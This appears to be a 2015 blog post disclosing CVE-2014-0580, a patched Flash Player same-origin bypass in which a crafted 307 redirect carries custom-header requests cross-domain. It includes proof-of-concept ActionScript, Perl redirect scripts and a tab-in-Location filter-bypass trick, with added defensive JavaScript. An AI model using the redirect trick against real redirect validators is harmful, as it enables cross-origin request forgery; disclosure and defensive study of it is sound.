Friday, June 12, 2015

Adobe Flash Player - Circumvent The Same-Origin Policy (CVE-2014-0580).

Flash Player restricts cross-domain requests that carry arbitrary custom headers, but there was a way to bypass that restriction. I reported it in October 2014 and it was fixed in December 2014.
I'd like to share the details of CVE-2014-0580. Don't expect too much. This vulnerability is very simple.

Flash Player prohibits cross-domain access unless the target domain grants permission in its crossdomain.xml. When an attacker tries to send a cross-domain HTTP request with custom headers, Flash Player fetches and checks crossdomain.xml before sending the request. However, a 307 redirect with a crafted Location header lets an attacker send the cross-domain request before crossdomain.xml is checked: the initial request goes to the attacker's own origin, so no policy check is needed, and the redirect (which a 307 tells the client to follow with the same method and body) is then followed off-origin without the check.
*This scenario is probably almost the same as CVE-2011-0059.

The crafted Location header looks like this (the character between the two leading slashes is a literal tab, 0x09, written here as \t):
HTTP/1.1 307 Temporary Redirect
Location: /\t/www.adobe.com/
Note: this variant works only on Chrome.

"/\t/" is useful for bypassing a domain-validation filter that only looks at the raw header string (for example, one that rejects values starting with "//" or with a scheme). You can test your browser's behavior with this snippet:
javascript:location.href="/\t/www.example.com/";
Copy and paste it into the browser's address bar or JavaScript console (inside the string literal, \t is a real tab). If the browser strips the tab before resolving the URL, the value becomes the scheme-relative URL "//www.example.com/" and you land on the top page of "www.example.com".
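To make the mismatch between "what the filter sees" and "what the browser resolves" concrete, here is an added example (my own code, not part of the original post or of Flash Player). It pits a naive string-based same-origin filter against a WHATWG-style URL parser (Node's built-in URL class, which strips ASCII tab and newline from its input before parsing, as Chrome does) and then shows a hardened filter that compares resolved origins instead of raw strings. The hostnames victim.example and www.adobe.com and the base path are assumed for illustration.

```javascript
// Added example, not from the original post. Assumed names: victim.example
// (the page's own origin) and www.adobe.com (the redirect target).

// Naive filter: treats a Location that starts with exactly one "/" and has no
// scheme as a same-origin path. "/\t/host/" passes because its second
// character is a tab, not "/".
function naiveSameOriginFilter(location) {
  if (/^[a-z][a-z0-9+.-]*:/i.test(location)) return false; // absolute URL
  if (location.startsWith('//')) return false;             // scheme-relative
  return location.startsWith('/');                         // "looks like" a path
}

// What the browser actually does: resolve Location against the current page
// with a WHATWG URL parser. Tab and newline are removed before parsing, so
// "/\t/www.adobe.com/" turns into "//www.adobe.com/" and leaves the origin.
function resolveLocation(location, base) {
  return new URL(location, base);
}

// Hardened filter: never reason about the raw string. Resolve first, then
// compare origins; anything unparsable is treated as not same-origin.
function safeSameOriginFilter(location, base) {
  try {
    return resolveLocation(location, base).origin === new URL(base).origin;
  } catch (e) {
    return false;
  }
}

// Evaluate one Location value under both filters and report where it resolves.
function evaluate(location, base) {
  let resolved = null;
  try { resolved = resolveLocation(location, base).href; } catch (e) { /* unparsable */ }
  return {
    location,
    naiveAllows: naiveSameOriginFilter(location),
    resolvesTo: resolved,
    safeAllows: safeSameOriginFilter(location, base),
  };
}

const BASE = 'https://victim.example/app/'; // assumed page origin

// Constructed Location values: the Chrome and Safari variants from the post,
// the newline twin of the tab trick, and a genuinely same-origin path.
const CASES = [
  '/\t/www.adobe.com/',
  '//www.adobe.com/',
  '/\n/www.adobe.com/',
  '/dashboard',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const c of CASES) console.log(evaluate(c, BASE));
}
```

Run it with node to see the table: the naive filter waves through the tab and newline variants, the parser sends both to https://www.adobe.com/, and the origin-comparison filter rejects everything except "/dashboard". The lesson is the one behind CVE-2014-0580 itself: any policy decision (crossdomain.xml or otherwise) must be made on the URL the client will actually fetch, after redirects and after the same normalization the client applies.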


I confirmed this issue on Chrome and Safari.

Sample ActionScript code (the request is same-origin, so no crossdomain.xml check happens; the CGI answers with a 307 whose Location points off-origin and Flash Player follows it, custom headers and all):
import flash.net.*;
import flash.events.*;

var req:URLRequest = new URLRequest("./location_flash.cgi");
req.method = URLRequestMethod.POST;
var header:URLRequestHeader = new URLRequestHeader("Content-type", "haru/jetstream");
req.requestHeaders.push(header);
var header2:URLRequestHeader = new URLRequestHeader("X-Haru", "yes!");
req.requestHeaders.push(header2);
req.data = "{\"test\":1}";
var loader:URLLoader = new URLLoader();
loader.addEventListener(Event.COMPLETE, loaderCompleteHD);
loader.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHD);
loader.dataFormat = URLLoaderDataFormat.TEXT;
loader.load(req);

function loaderCompleteHD(e:Event):void { trace("complete: " + loader.data); }
function ioErrorHD(e:IOErrorEvent):void { trace("io error: " + e.text); }
 
Server-side sample code for Chrome (location_flash.cgi):
#! /usr/local/bin/perl --
# "\t" in the double-quoted string emits a real tab (0x09) between the slashes.
# Chrome strips it and resolves the Location as the scheme-relative URL //www.adobe.com/
print "Status: 307\n";
print "Location: /\t/www.adobe.com/\n\ntest";

Server-side sample code for Safari on Mac (location_flash.cgi):
#! /usr/local/bin/perl --
print "Status: 307\n";
print "Location: //www.adobe.com/\n\ntest"; # No need to bypass the filter :-(